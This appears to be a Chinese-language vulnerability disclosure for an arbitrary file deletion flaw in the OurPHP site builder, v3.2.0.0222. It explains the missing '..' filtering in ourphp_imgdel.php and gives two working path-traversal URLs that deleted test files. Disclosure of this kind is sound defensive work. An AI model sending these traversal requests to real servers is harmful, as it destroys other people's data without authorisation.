登录 白背景
源码

Ourphp建站系统任意文件删除

漏洞描述

OurPHP是一款基于PHP MySQL开发符合W3C标准的建站系统,攻击者通过漏洞删除服务器的任意文件

漏洞影响

ourphp-v3.2.0.0222

FOFA

不提供

漏洞复现

漏洞点位于:

/client/manage/ourphp_imgdel.php

img

干净利落没有任何过滤,简单判断是否有function/uploadfile字符(function/uploadfile是上传文件目录),如果有则继续判断有无文件或者目录,如果有则删除

其中没有针对. 和..做过滤

复现:

在网站根目录和盘符中各创建一个文件如下图:

网站根目录创建文件123.txt、盘符中创建文件1.txt

img

img

访问链接

http://ourphp.local/client/manage/ourphp_imgdel.php?url=../../function/uploadfile/../../123.txt

img

访问链接

http://ourphp.local/client/manage/ourphp_imgdel.php?url=../../function/uploadfile/../../../../../1.txt

img

全部删除成功